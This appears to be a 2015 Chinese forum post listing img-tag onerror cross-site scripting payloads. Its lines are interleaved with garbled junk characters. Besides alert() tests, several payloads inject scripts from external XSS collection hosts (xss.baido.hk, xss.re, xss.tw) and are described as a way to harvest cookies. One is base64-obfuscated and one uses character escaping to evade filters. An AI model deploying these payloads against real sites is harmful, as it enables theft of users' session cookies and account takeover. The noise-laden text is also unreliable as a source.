<img src='non-exist.jpg'onerror="alert('xss')">
+ Z! \$ Q* @; s m2 r: f: s7 Q. V<img src=# onerror=alert(123)>4 \$ N [3 r( } I# g9 I
<img src=# onerror=alert(document.cookie)>
5 n5 C+ J7 Y- D# t- ~下面是利用平台钓cookie的
/ F% _, y7 _; b& P; \4 ~( ?. d0 \ <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
+ R- N" |0 o% k" _+ k% z; r I
8 m! q4 E0 I1 O8 J: \. V) k1 H
9 g/ I$ ^0 L8 e7 B<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
, K4 C/ O/ b4 P+ g/ N<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
" F- b+ C! a- ?. {5 |! T7 M+ U6 _( l- v“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>2 W+ c$ _9 g9 t9 W# P
<img src=1 onerror=jQuery.getScript("//xss.re/974")> 2 R+ K+ ~5 {+ S0 L
<img src="#">4 B! u% E- j/ d1 b
<img src="#">
* a5 J3 z! S0 \* r+ b, ~<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
" e1 r/ O& `5 z5 u# h; ]! O<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
- G* ~1 H8 m& D7 l$ ]2 j3 N* j/ d<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>7 @ Y' c6 Z. G! t' b/ |( }, |
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
! t# O4 ?* k3 a) T2 O3 }<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>) p( J4 \3 z4 [% n
<img src=x width="0" height="0"></img>4 \; v! U- E5 j- W/ J% A
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>' p: V& i7 R5 x1 A5 K; c
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>6 \9 J0 Y( N& N" ^; x% T+ a1 r/ N
|
发表于 2015-10-18 14:33:54
收藏
支持
反对